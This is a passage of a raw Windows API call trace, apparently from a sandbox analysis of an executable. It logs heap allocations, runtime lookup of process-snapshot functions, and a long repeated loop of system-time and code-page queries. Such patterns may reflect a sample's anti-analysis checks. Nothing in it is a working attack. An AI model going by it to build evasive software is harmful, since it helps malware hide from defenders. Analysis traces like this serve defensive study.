RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2b2118 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2b2138 [0129.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x46) returned 0x2b2158 [0129.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2b11f8 | out: hHeap=0x2b0000) returned 1 [0129.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2b21a8 [0129.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2b11f8 [0129.135] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0129.136] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b11f8) returned 0x80 [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.136] GetLastError () returned 0x0 [0129.136] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.137] GetLastError () returned 0x0 [0129.137] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.138] SetLastError (dwErrCode=0x0) [0129.138] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.139] SetLastError (dwErrCode=0x0) [0129.139] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] SetLastError (dwErrCode=0x0) [0129.140] GetLastError () returned 0x0 [0129.140] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0129.140] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0129.140] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0129.140] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0129.143] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0129.143] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0129.144] GetTickCount () returned 0x1154902 [0129.144] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.144] GetACP () returned 0x4e4 [0129.144] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.144] GetACP () returned 0x4e4 [0129.144] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.144] GetACP () returned 0x4e4 [0129.144] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.144] GetACP () returned 0x4e4 [0129.144] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.144] GetACP () returned 0x4e4 [0129.144] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.145] GetACP () returned 0x4e4 [0129.145] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.145] GetACP () returned 0x4e4 [0129.145] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.145] GetACP () returned 0x4e4 [0129.145] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.145] GetACP () returned 0x4e4 [0129.145] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.145] GetACP () returned 0x4e4 [0129.145] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.145] GetACP () returned 0x4e4 [0129.145] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.145] GetACP () returned 0x4e4 [0129.145] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.146] GetACP () returned 0x4e4 [0129.146] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.146] GetACP () returned 0x4e4 [0129.146] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.146] GetACP () returned 0x4e4 [0129.146] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.146] GetACP () returned 0x4e4 [0129.146] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.146] GetACP () returned 0x4e4 [0129.146] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.146] GetACP () returned 0x4e4 [0129.146] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.147] GetACP () returned 0x4e4 [0129.147] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.147] GetACP () returned 0x4e4 [0129.147] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.147] GetACP () returned 0x4e4 [0129.147] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.147] GetACP () returned 0x4e4 [0129.147] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.147] GetACP () returned 0x4e4 [0129.147] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.147] GetACP () returned 0x4e4 [0129.147] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.147] GetACP () returned 0x4e4 [0129.147] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.147] GetACP () returned 0x4e4 [0129.147] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.148] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.148] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.148] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.148] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.148] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.148] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.148] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.148] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.148] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.148] GetACP () returned 0x4e4 [0129.149] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.149] GetACP () returned 0x4e4 [0129.149] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.149] GetACP () returned 0x4e4 [0129.149] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.149] GetACP () returned 0x4e4 [0129.149] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.149] GetACP () returned 0x4e4 [0129.149] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.149] GetACP () returned 0x4e4 [0129.149] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.149] GetACP () returned 0x4e4 [0129.149] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.149] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.149] GetACP () returned 0x4e4 [0129.149] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.150] GetACP () returned 0x4e4 [0129.150] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.150] GetACP () returned 0x4e4 [0129.150] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.150] GetACP () returned 0x4e4 [0129.150] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.150] GetACP () returned 0x4e4 [0129.150] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.150] GetACP () returned 0x4e4 [0129.150] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.150] GetACP () returned 0x4e4 [0129.150] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.150] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.150] GetACP () returned 0x4e4 [0129.150] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.151] GetACP () returned 0x4e4 [0129.151] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.151] GetACP () returned 0x4e4 [0129.151] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.151] GetACP () returned 0x4e4 [0129.151] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.151] GetACP () returned 0x4e4 [0129.151] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.151] GetACP () returned 0x4e4 [0129.151] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.151] GetACP () returned 0x4e4 [0129.151] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.151] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.151] GetACP () returned 0x4e4 [0129.151] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.152] GetACP () returned 0x4e4 [0129.152] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.152] GetACP () returned 0x4e4 [0129.152] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.152] GetACP () returned 0x4e4 [0129.152] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.152] GetACP () returned 0x4e4 [0129.152] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.152] GetACP () returned 0x4e4 [0129.152] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.152] GetACP () returned 0x4e4 [0129.152] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.152] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.152] GetACP () returned 0x4e4 [0129.152] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | 